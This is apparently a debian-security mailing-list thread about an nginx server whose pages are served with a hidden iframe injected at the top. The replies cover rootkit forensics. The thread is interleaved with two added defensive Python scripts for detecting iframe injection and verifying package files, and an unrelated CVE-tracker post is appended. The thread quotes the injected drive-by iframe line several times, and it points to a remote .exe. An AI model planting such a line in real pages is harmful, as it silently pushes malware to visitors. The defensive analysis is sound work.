debian wheezy i386 nginx iframe rootkit

2013-09-11 Thread E Frank Ball III
Last fall there was a debian 64-bit / nginx rootkit going around,
now I've been hit with what sounds similar but on 32-bit wheezy.

Here's a link to info on the previous 64-bit rootkit:
https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections


All files served by nginx have this line inserted at the top:

<iframe src="http://122.226.137.123:/yixi.exe" width=0 height=0></iframe>

Whatever it was isn't there anymore:
 Connecting to 122.226.137.123:... failed: Connection refused.

I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
difference.

No insmod line in /etc/rc.local

I haven't been able to find anything.  Googling doesn't show anything
similar for debian wheezy i386, only squeeze 64-bit.

I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
the nginx-light from debian wheezy but it made no difference.

This machine was built on July 19th.  I've uninstalled nginx. I'll hold
off rebuilding for now, maybe somebody here has some ideas?

   E Frank Ball  fra...@efball.com


-- 
To UNSUBSCRIBE, email to debian-security-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/20130911224820.gf30...@kamajii.efball.com



Re: debian wheezy i386 nginx iframe rootkit

2013-09-11 Thread Joel Rees
On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III fra...@efball.com wrote:
> Last fall there was a debian 64-bit / nginx rootkit going around,
> now I've been hit with what sounds similar but on 32-bit wheezy.
>
> Here's a link to info on the previous 64-bit rootkit:
> https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections
>
>
> All files served by nginx have this line inserted at the top:
>
> <iframe src="http://122.226.137.123:/yixi.exe" width=0 height=0></iframe>
>
> Whatever it was isn't there anymore:
>  Connecting to 122.226.137.123:... failed: Connection refused.
>
> I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
> Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
> difference.
>
> No insmod line in /etc/rc.local
>
> I haven't been able to find anything.  Googling doesn't show anything
> similar for debian wheezy i386, only squeeze 64-bit.
>
> I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
> the nginx-light from debian wheezy but it made no difference.
>
> This machine was built on July 19th.  I've uninstalled nginx. I'll hold
> off rebuilding for now, maybe somebody here has some ideas?
>
> E Frank Ball  fra...@efball.com

Just out of curiosity, did you back up nginx and check it as well?


--
Joel Rees

Be careful where you see conspiracy.
Look first in your own heart.


Archive: http://lists.debian.org/caar43iojy_q8kuu47y+ah+v0e81vtnwykh2f6lvvcowqans...@mail.gmail.com



Re: debian wheezy i386 nginx iframe rootkit

2013-09-11 Thread E Frank Ball III
On Thu, Sep 12, 2013 at 09:13:46AM +0900, Joel Rees wrote:
> On Thu, Sep 12, 2013 at 7:48 AM, E Frank Ball III fra...@efball.com wrote:
> > Last fall there was a debian 64-bit / nginx rootkit going around,
> > now I've been hit with what sounds similar but on 32-bit wheezy.
> >
> > All files served by nginx have this line inserted at the top:
> >
> > <iframe src="http://122.226.137.123:/yixi.exe" width=0 height=0></iframe>
> >
> > I tar'd up /lib/modules/3.2.0-4-686-pae/kernel, copied it to another
> > Debian Wheezy i386 machine in a safe environment and did a diff -r.  No
> > difference.
> >
> > No insmod line in /etc/rc.local
> >
> > I haven't been able to find anything.  Googling doesn't show anything
> > similar for debian wheezy i386, only squeeze 64-bit.
> >
> > I was using nginx-light from dotdeb.org.  I uninstalled nginx and tried
> > the nginx-light from debian wheezy but it made no difference.
>
> Just out of curiosity, did you back up nginx and check it as well?
>
> --
> Joel Rees


No, I just uninstalled nginx from dotdeb and installed from Debian.

The webpages are all static and remain unchanged, the nginx config files
are OK.  The new line is added by some process I can't find.

The lynx web browser shows this as the first line of the webpages:

IFRAME: http://122.226.137.123:/yixi.exe

It also appears in downloads using wget.
View source in Firefox or Chrome shows nothing amiss.

It only appears on IPv4, not IPv6.

I do not have php installed.

The HTTP headers are completely different:

curl -I shows this:
 HTTP/1.1 200 OK
 Content-Type: text/html; charset=en_US.UTF-8
 Content-Length: 3634

When it should look more like this:
 HTTP/1.1 200 OK
 Server: nginx/1.4.2
 Date: Wed, 11 Sep 2013 23:39:48 GMT
 Content-Type: text/html; charset=en_US.UTF-8
 Content-Length: 3291
 Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT
 Connection: keep-alive
 Vary: Accept-Encoding
 ETag: 5101a7f4-cdb
 Accept-Ranges: bytes

I installed chkrootkit, rkhunter, unhide.rb and they found nothing.


   E Frank Ball  fra...@efball.com



Archive: http://lists.debian.org/20130912003916.gh30...@kamajii.efball.com
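An added example, not something posted in this thread: a small Python checker that does programmatically what Frank did by hand with curl -I and lynx. It parses a saved raw HTTP response, lists iframes that are zero-sized or point at a host other than the site being served, and reports which headers a normal nginx answer carries but this one lacks. The two sample responses are constructed from the headers and the iframe URL quoted above (other values are made up); the site name www.example.com and the list of expected headers are assumptions, and fetch_raw is an added helper for pulling the same page over IPv4 and IPv6 separately, since the injection was reported only on IPv4.

```python
import socket
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Headers a healthy nginx 1.4.x answer normally carries (assumed baseline). A
# rewrite that regenerates the response tends to drop them, which is what the
# curl -I comparison in the thread shows.
EXPECTED_HEADERS = ("Server", "Date", "Last-Modified", "ETag", "Accept-Ranges")

# Constructed sample responses modelled on the thread's curl -I output. Only the
# iframe URL is the one reported in the thread; the rest is made up.
INJECTED_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=en_US.UTF-8\r\n"
    b"Content-Length: 113\r\n"
    b"\r\n"
    b'<iframe src="http://122.226.137.123:/yixi.exe" width=0 height=0></iframe>\n'
    b"<html><body><p>Hello</p></body></html>\n"
)
CLEAN_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx/1.4.2\r\n"
    b"Date: Wed, 11 Sep 2013 23:39:48 GMT\r\n"
    b"Content-Type: text/html; charset=en_US.UTF-8\r\n"
    b"Content-Length: 39\r\n"
    b"Last-Modified: Thu, 24 Jan 2013 21:30:28 GMT\r\n"
    b"Connection: keep-alive\r\n"
    b'ETag: "5101a7f4-cdb"\r\n'
    b"Accept-Ranges: bytes\r\n"
    b"\r\n"
    b"<html><body><p>Hello</p></body></html>\n"
)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, header dict, body text)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body.decode("utf-8", "replace")


class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag in a document."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def find_hidden_iframes(body, site_host):
    """Return src values of iframes that are zero-sized or point off-site."""
    collector = _IframeCollector()
    collector.feed(body)
    hits = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        zero_sized = attrs.get("width") == "0" or attrs.get("height") == "0"
        # A relative src has no hostname and counts as same-site.
        off_site = bool(src) and (urlsplit(src).hostname or site_host).lower() != site_host.lower()
        if zero_sized or off_site:
            hits.append(src)
    return hits


def missing_expected_headers(headers):
    return [h for h in EXPECTED_HEADERS if h.lower() not in headers]


def audit_response(raw, site_host):
    """Audit one raw response; 'suspicious' if any hidden iframe is present or
    the answer lacks two or more of the headers nginx normally sends."""
    status, headers, body = parse_response(raw)
    hidden = find_hidden_iframes(body, site_host)
    missing = missing_expected_headers(headers)
    return {"status": status, "hidden_iframes": hidden,
            "missing_headers": missing,
            "suspicious": bool(hidden) or len(missing) >= 2}


def fetch_raw(host, path="/", family=socket.AF_INET, port=80, timeout=10):
    """Fetch one page over a chosen address family and return the raw bytes,
    so the IPv4 and IPv6 answers can be audited side by side."""
    addr = socket.getaddrinfo(host, port, family, socket.SOCK_STREAM)[0][4]
    with socket.create_connection(addr[:2], timeout=timeout) as s:
        s.sendall(b"GET %s HTTP/1.0\r\nHost: %s\r\n\r\n" % (path.encode(), host.encode()))
        chunks = []
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        host = sys.argv[1]
        for fam, label in ((socket.AF_INET, "IPv4"), (socket.AF_INET6, "IPv6")):
            try:
                print(label, audit_response(fetch_raw(host, family=fam), host))
            except OSError as exc:
                print(label, "fetch failed:", exc)
    else:
        print(audit_response(INJECTED_RESPONSE, "www.example.com"))
```

Run it with a hostname as the only argument to compare the IPv4 and IPv6 answers of a live server, or without arguments to see the verdict on the constructed injected sample. The header check is a heuristic against an assumed baseline, so tune EXPECTED_HEADERS to what your own nginx build actually emits before trusting the 'suspicious' flag.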



Re: debian wheezy i386 nginx iframe rootkit

2013-09-11 Thread Rick Moen
Quoting E Frank Ball III (fra...@efball.com):

> Last fall there was a debian 64-bit / nginx rootkit going around,
> now I've been hit with what sounds similar but on 32-bit wheezy.

I hope you're aware that -- at least in the standard usage of the word
'rootkit' -- a rootkit doesn't 'go around', but rather is a set of
concealment software an intruder installs after breaking in via other
means, in order to hide his/her presence and processes.

> Here's a link to info on the previous 64-bit rootkit:
> https://www.securelist.com/en/blog/208193935/New_64_bit_Linux_Rootkit_Doing_iFrame_Injections

Article cites Crowdstrike Blog as its source of information but then
gives the incorrect URL.  Here's the correct one: 
http://www.crowdstrike.com/blog/http-iframe-injecting-linux-rootkit/index.html

(Note that the page concludes that the means of entry and escalation to 
root access in the host studied is unknown.)

> This machine was built on July 19th.  I've uninstalled nginx. I'll hold
> off rebuilding for now, maybe somebody here has some ideas?

Well, for starters, if you think the machine has been root compromised,
you really cannot trust data gathered from the live system.


Archive: http://lists.debian.org/20130912002644.gj7...@linuxmafia.com
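An added example, not posted by anyone in the thread, of the kind of offline check Rick's point calls for: boot from trusted media, mount the suspect disk read-only, and compare the files on it with dpkg's per-package md5sums manifests from outside the running system, rather than trusting chkrootkit or diff output produced on the live host. The mount point, the package name demo-pkg and the sample files are constructed for the demo. The mounted system's own var/lib/dpkg/info manifests are used by default, but an intruder with root could have rewritten those too, so a directory of manifests extracted from known-good .deb files should be passed in instead.

```python
import hashlib
import os
import tempfile

CHUNK = 65536


def md5_of_file(path):
    # MD5 only because that is what dpkg's manifests record: this is an
    # integrity comparison against a trusted manifest, not a signature.
    digest = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(CHUNK), b""):
            digest.update(chunk)
    return digest.hexdigest()


def load_manifests(manifest_dir):
    """Read every *.md5sums manifest in manifest_dir.

    Returns a list of (package, expected_md5, relative_path). Files with no
    manifest entry (conffiles, locally added files) are simply not listed."""
    entries = []
    for name in sorted(os.listdir(manifest_dir)):
        if not name.endswith(".md5sums"):
            continue
        pkg = name[: -len(".md5sums")]
        with open(os.path.join(manifest_dir, name), encoding="utf-8") as fh:
            for line in fh:
                parts = line.split(None, 1)
                if len(parts) == 2:
                    entries.append((pkg, parts[0], parts[1].strip()))
    return entries


def verify_mounted_root(root, manifest_dir=None):
    """Compare files under a mounted (not booted) root with dpkg md5sums.

    manifest_dir defaults to the mounted system's own var/lib/dpkg/info;
    prefer a directory of manifests taken from known-good .deb files."""
    if manifest_dir is None:
        manifest_dir = os.path.join(root, "var/lib/dpkg/info")
    findings = []
    for pkg, expected, rel in load_manifests(manifest_dir):
        path = os.path.join(root, rel)
        if not os.path.isfile(path):
            findings.append(("MISSING", pkg, rel))
        elif md5_of_file(path) != expected:
            findings.append(("MODIFIED", pkg, rel))
    return findings


def make_demo_root():
    """Build a constructed throwaway root: one package manifest covering an
    untouched file, a file altered after 'installation', and a missing one."""
    root = tempfile.mkdtemp(prefix="demo-root-")
    info = os.path.join(root, "var/lib/dpkg/info")
    os.makedirs(info)
    os.makedirs(os.path.join(root, "usr/sbin"))
    os.makedirs(os.path.join(root, "lib/modules/demo/kernel"))
    files = {
        "usr/sbin/webserver": b"original web server binary\n",
        "lib/modules/demo/kernel/demo.ko": b"original kernel module\n",
        "usr/sbin/helper": b"helper that will go missing\n",
    }
    lines = []
    for rel, content in files.items():
        full = os.path.join(root, rel)
        with open(full, "wb") as fh:
            fh.write(content)
        lines.append("%s  %s\n" % (md5_of_file(full), rel))
    with open(os.path.join(info, "demo-pkg.md5sums"), "w", encoding="utf-8") as fh:
        fh.writelines(lines)
    # Simulate post-install tampering and a deleted file.
    with open(os.path.join(root, "usr/sbin/webserver"), "ab") as fh:
        fh.write(b"injected code\n")
    os.remove(os.path.join(root, "usr/sbin/helper"))
    return root


if __name__ == "__main__":
    import sys
    # e.g. python3 verify.py /mnt [/path/to/trusted/manifests]
    target = sys.argv[1] if len(sys.argv) > 1 else make_demo_root()
    manifests = sys.argv[2] if len(sys.argv) > 2 else None
    for kind, pkg, rel in verify_mounted_root(target, manifests):
        print(kind, pkg, rel)
```

Run without arguments to see the two findings on the constructed root, or with the mount point of the suspect disk (and optionally a trusted manifest directory) from a rescue environment. A clean result only says the packaged files match; it says nothing about files no package owns, which is where the earlier hand-made diff -r of the kernel module tree still has a place.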



External check

2013-09-11 Thread Raphael Geissert
CVE-2013-3361: RESERVED
CVE-2013-3362: RESERVED
CVE-2013-3363: RESERVED
CVE-2013-4181: RESERVED
CVE-2013-4291: RESERVED
CVE-2013-5324: RESERVED
--
The output might be a bit terse, but the above ids are known elsewhere,
check the references in the tracker. The second part indicates the status
of that id in the tracker at the moment the script was run.


-- 
To UNSUBSCRIBE, email to debian-security-tracker-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Archive: http://lists.debian.org/52301139.cynh6wa7os2gwjil%atomo64+st...@gmail.com